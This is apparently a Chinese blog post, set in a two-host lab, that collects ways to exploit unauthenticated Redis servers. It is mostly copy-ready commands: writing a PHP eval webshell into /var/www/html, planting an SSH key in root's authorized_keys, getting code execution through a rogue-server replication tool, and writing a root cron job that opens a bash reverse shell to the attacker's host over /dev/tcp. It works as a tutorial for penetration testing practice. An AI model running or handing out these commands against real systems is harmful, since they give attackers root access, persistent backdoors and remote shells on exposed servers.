Redis未授权访问漏洞利用合集

Aaron_Jㅤ2024-08-18 9:58

一、基本信息

靶机:IP:192.168.100.40

攻击机:IP:192.168.100.60

二、漏洞 & 过程

Redis 未授权访问漏洞利用无口令远程登录靶机

靶机

复制代码

|---|--------------------------------|
| | cd redis-4.0.8/src |
| | ./redis-server ../redis.conf |

攻击机

复制代码

|---|---------------------------------|
| | ./redis-cli -h 192.168.100.40 |

Redis 未授权访问漏洞利用持久化写入一句话木马

攻击机写下如下 redis 命令
复制代码

|---|--------------------------------------------------------------------|
| | config set dir /var/www/html |
| | config set dbfilename test.php |
| | set webshell "\r\n\r\n<?php @eval($_POST['passwd']); ?>\r\n\r\n" |
| | save |

蚁剑连接

Redis 未授权访问漏洞利用公私钥认证获取 root 权限

攻击机 & 靶机

复制代码

|---|---------------------|
| | ssh-keygen -t rsa |

攻击机

复制代码

|---|------------------------------------------------------------------------------|
| | (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > 1.txt |
| | cat 1.txt | /root/redis-4.0.8/src/redis-cli -h 192.168.100.40 -x set crack |

复制代码

|---|-----------------------------------------|
| | config set dir /root/.ssh |
| | config set dbfilename authorized_keys |
| | save |

远程连接
复制代码

|---|-------------------------------------|
| | ssh -i id_rsa [email protected] |

Redis 未授权访问漏洞利用攻击软件获得 shell

攻击机

复制代码

|---|---------------------------------|
| | cd /root/redis-4.0.8/src |
| | ./redis-cli -h 192.168.100.40 |
| | slaveof 192.168.100.60 6379 |
| | info replication |

复制代码

|---|-----------------------------------------------------|
| | unzip redis-rogue-server-master.zip |
| | cd redis-rogue-server-master/RedisModulesSDK/exp |
| | make |

复制代码

|---|----------------------------------------------------------------------------------------------------------------------------|
| | python3 /root/redis-rogue-server-master/redis-rogue-server.py --rhost 192.168.100.40 --lhost 192.168.100.60 --exp exp.so |

未授权访问漏洞利用持久化写计划任务来反弹一个 shell 权限

攻击机监听端口

复制代码

|---|-----------------|
| | nc -lvvp 8888 |

设置 shell 反弹

复制代码

|---|---------------------------------------------------------------------------------|
| | cd /root/redis-4.0.8/src |
| | ./redis-cli -h 192.168.100.40 |
| | set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.100.60/8888 0>&1\n\n" |
| | config set dir /var/spool/cron/ |
| | config set dbfilename root |
| | save |

反弹成功

作 者:PeiyuJue

链 接: Redis未授权访问漏洞利用合集 -- Candid Chronicles

来 源:Aaron的博客

版 权 声 明:本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0许可协议。文章版权归作者所有,未经允许请勿转载!

相关推荐
菜就多练吧12 分钟前
Redis与Mysql双写一致性如何保证?
数据库·redis·mysql
佩奇的技术笔记16 分钟前
高级:Redis 面试题精讲
数据库·redis·缓存
遥不可及~~斌26 分钟前
基于Redis实现短信防轰炸的Java解决方案
java·数据库·redis
李詹29 分钟前
海外高防服务器延迟优化——跨国业务安全加速的底层逻辑
网络·安全·网络安全·负载均衡·网络攻击模型·ddos
AronTing1 小时前
300%性能提升!CompletableFuture异步编排四大核心模式与避坑指南
java·后端·安全
xiaolou2 小时前
Redis五种基本数据结构
redis·后端
sszdlbw2 小时前
BUUCTF-web刷题篇(17)
安全·web安全·web·buuctf
humors2212 小时前
提升Windows安全的一些措施
网络安全·系统安全
卓豪终端管理2 小时前
黑白名单管理:构建安全高效的访问控制体系
运维·网络·安全·web安全·网络安全
中云DDoS CC防护蔡蔡2 小时前
tcp/ip攻击及防范
运维·服务器·tcp/ip·网络安全·ddos
热门推荐
01RAG 实践- Ollama+RagFlow 部署本地知识库02我决定放弃搞 Java 了03如何在WPS和Word/Excel中直接使用DeepSeek功能04空中无人机等动态目标识别2025.4.405汽车上的各种质量:整备质量、总质量、装载质量、簧上质量、簧下质量06DeepSeek各版本说明与优缺点分析07从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑08生活电子常识--删除谷歌浏览器搜索记录09DeepSeek RAGFlow构建本地知识库系统10如何用deepseek生成流程图